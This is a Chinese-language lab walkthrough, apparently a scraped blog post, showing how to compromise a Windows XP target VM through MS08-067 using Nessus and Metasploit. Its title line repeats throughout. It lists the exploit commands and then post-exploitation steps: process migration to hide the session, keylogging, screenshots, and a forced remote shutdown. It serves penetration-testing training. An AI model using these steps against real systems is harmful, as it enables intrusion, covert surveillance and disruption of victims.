一、Nessus扫描漏洞
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 二、metasploit渗透
启动metasploit,输入命令msfconsole
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 使用search 命令搜索未打补丁编号,search ms08-067
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 使用由nessus确定的攻击程序,use
攻击程序。再查看配置的信息
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 设置接收主机IP和发送主机IP地址,再查看配置信息,确定
set RHOST 靶机IP
set LHOST 发起攻击主机IP
show options
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 开始渗透攻击,exploit
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 成功进入meterpreter shell,输入screenshot可捕捉靶机桌面
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 查看捕捉到的靶机图片,输入命令后,即可打开捕捉到的图片
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 查看meterpreter的id号,getpid。查看explorer.exe的ID号。
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 接下来需要隐藏id到explorer.exe中。migrate
1400,再查看当前meterpreter的id是否隐藏好
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 启动键盘记录keyscan_start,转储从靶机获取的键盘记录keyscan_dump,终止键盘记录keyscan_stop。
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 查看靶机正在运行的用户
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 进入shell,这里面做个测试在C盘根目录创建一个文件夹为test_file
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 在靶机系统中可以看见test_file文件夹
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 在20秒后关闭对方系统,并显示信息your computer has been hacked
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 靶机被关闭,且有消息提示
linux渗透利用漏洞ms08_067,渗透测试——利用ms08-067漏洞渗透测试靶机XP 
